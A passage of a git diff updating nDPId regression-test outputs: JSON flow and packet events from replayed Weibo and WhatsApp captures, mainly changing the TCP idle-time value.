+00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48353,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073488,"flow_last_seen":1463089073488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48353,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48356,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.174.1","src_port":48356,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089071551,"flow_last_seen":1463089071612,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":7148,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073289,"flow_last_seen":1463089073763,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":33822,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1463089067804,"flow_last_seen":1463089068491,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":618,"flow_tot_l4_payload_len":1566,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"216.58.210.14","dst_ip":"192.168.1.105","src_port":443,"dst_port":49361,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1463089067804,"flow_last_seen":1463089068491,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":618,"flow_tot_l4_payload_len":1566,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"216.58.210.14","dst_ip":"192.168.1.105","src_port":443,"dst_port":49361,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1463089070841,"flow_last_seen":1463089071891,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":1081,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59119,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089070841,"flow_last_seen":1463089071198,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59120,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089070841,"flow_last_seen":1463089071198,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59120,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089071008,"flow_last_seen":1463089071348,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59121,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089071008,"flow_last_seen":1463089071348,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59121,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071046,"flow_last_seen":1463089071094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.206","src_port":35154,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071046,"flow_last_seen":1463089071094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.206","src_port":35154,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1463089070841,"flow_last_seen":1463089071891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":1081,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59119,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089070841,"flow_last_seen":1463089071198,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59120,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089070841,"flow_last_seen":1463089071198,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59120,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089071008,"flow_last_seen":1463089071348,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59121,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089071008,"flow_last_seen":1463089071348,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"114.134.80.162","src_port":59121,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071046,"flow_last_seen":1463089071094,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.206","src_port":35154,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071046,"flow_last_seen":1463089071094,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.206","src_port":35154,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1463089070755,"flow_last_seen":1463089072356,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":391,"flow_tot_l4_payload_len":1586,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.227","src_port":53656,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1463089070755,"flow_last_seen":1463089072356,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":391,"flow_tot_l4_payload_len":1586,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.227","src_port":53656,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073479,"flow_last_seen":1463089073479,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50533,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":79,"flow_first_seen":1463089071613,"flow_last_seen":1463089072438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2872,"flow_tot_l4_payload_len":31898,"flow_avg_l4_payload_len":403,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":79,"flow_first_seen":1463089071613,"flow_last_seen":1463089072438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2872,"flow_tot_l4_payload_len":31898,"flow_avg_l4_payload_len":403,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.137","src_port":51698,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} 00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073760,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50640,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073394,"flow_last_seen":1463089073394,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":11798,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","packets-captured":498,"packets-processed":498,"total-skipped-flows":0,"total-l4-data-len":234875,"total-not-detected-flows":0,"total-guessed-flows":21,"total-detected-flows":23,"total-detection-updates":11,"total-updates":0,"current-active-flows":0,"total-active-flows":44,"total-idle-flows":44,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":239,"global_ts_msec":1463089073893} diff --git a/test/results/whatsapp_login_call.pcap.out b/test/results/whatsapp_login_call.pcap.out index b83ed74a6..ea7e739c8 100644 --- a/test/results/whatsapp_login_call.pcap.out +++ b/test/results/whatsapp_login_call.pcap.out @@ -1,45 +1,45 @@ 00470{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1432582222253} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582222253,"flow_last_seen":1432582222253,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582222253,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.70","src_port":49199,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1432582222253,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582222253,"pkt":"xiwDYGpkAPS5Jrv0CABFAAA0DNdAAEAG9U7AqAIEEaxkRsAvA+GIPSCcUlOPyIAQH\/poTQAAAQEICi36Gt0QlQ1l"} -00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1432582222267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":236,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":236,"pkt_l4_len":202,"thread_ts_msec":1432582222267,"pkt":"xiwDYGpkAPS5Jrv0CABFAADeU1tAAEAGriDAqAIEEaxkRsAvA+GIPSCcUlOPyIAYIAB\/kgAAAQEICi36GusQlQ1lFwMBACCNqYpymgjJuQNgLA+QJekfsmHWqykdlwnJ8t48lRIpCxcDAQCAv+6eyOO6KHhFdGRnKCRyPqihrwnYLrpV5EXpUrXv8Q2ow7fiZ\/ErfHE9ZAprbeZEb1cjDczzZ9GWtg7wUDK1rjYT+gKbhCMZiNQZ3QlWly2tQPPw5M7rqWdzOWy2ATMXqxCkXOBCTdOBYD70ikDCSIjo2fZ8\/cJDhiGvSnc\/9Rw="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1432582222410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1432582222410,"pkt":"APS5Jrv0xiwDYGpkCABFAAA0e5UAAC8G15ARrGRGwKgCBAPhwC9SU4\/IiD0hRoAQAJuGIAAAAQEIChCVDjkt+hrr"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582223075,"flow_last_seen":1432582223075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582223075,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.154.66.121","src_port":49166,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1432582223075,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582223075,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoimtAAEAGmaXAqAIEEZpCecAOAbvaSAv6foHOKFARQABkXQAA"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582223077,"flow_last_seen":1432582223077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582223077,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.154.66.111","src_port":49163,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1432582223077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582223077,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAowYpAAEAGYpDAqAIEEZpCb8ALAbvQPf\/UHJzPWVARQADbTgAA"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1432582223271,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582223271,"pkt":"APS5Jrv0xiwDYGpkCABFAAAo1rsAAPAG3V4RmkJvwKgCBAG7wAscnM9Z0D3\/1VARCf8RTwAA"} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1432582223276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582223276,"pkt":"APS5Jrv0xiwDYGpkCABFAAAos7EAAPAGAF8RmkJ5wKgCBAG7wA5+gc4o2kgL+1ARCf+aXQAA"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1432582223379,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582223379,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAoD6pAAEAGFHHAqAIEEZpCb8ALAbvQPf\/VHJzPWlAQQADbTQAA"} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1432582223379,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432582223379,"pkt":"xiwDYGpkAPS5Jrv0CABFAAAo\/GpAAEAGJ6bAqAIEEZpCecAOAbvaSAv7foHOKVAQQABkXAAA"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432582224208,"flow_last_seen":1432582224208,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582224208,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49169,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 